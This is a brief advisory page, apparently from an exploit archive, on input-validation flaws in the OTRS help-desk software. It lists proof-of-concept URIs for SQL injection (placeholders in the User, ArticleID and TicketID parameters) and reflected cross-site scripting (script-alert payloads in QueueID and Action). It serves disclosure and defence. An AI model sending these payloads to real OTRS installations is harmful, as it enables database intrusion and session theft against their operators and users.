|
OTRS Multiple Input Validation Vulnerabilities
No exploit is required. The following proof of concept URI are available: http://www.example.com/index.pl?Action=Login&User=%27[SQL_HERE] http://www.example.com/admin/index.pl?Action=AgentTicketPlain&ArticleID=1&TicketID=1%20[SQL_HERE] http://www.example.com/admin/index.pl?Action=AgentTicketPlain&TicketID=1&ArticleID=1%20[SQL_HERE] http://www.example.com/index.pl?QueueID=%22%3E%3Cscript%3Ealert('[XSS_HERE]')%3B%3C/script%3E%3Cx%20y=%22 http://www.example.com/index.pl?Action="><script>alert(document.title);</script><x%20" |
|
|
Privacy Statement |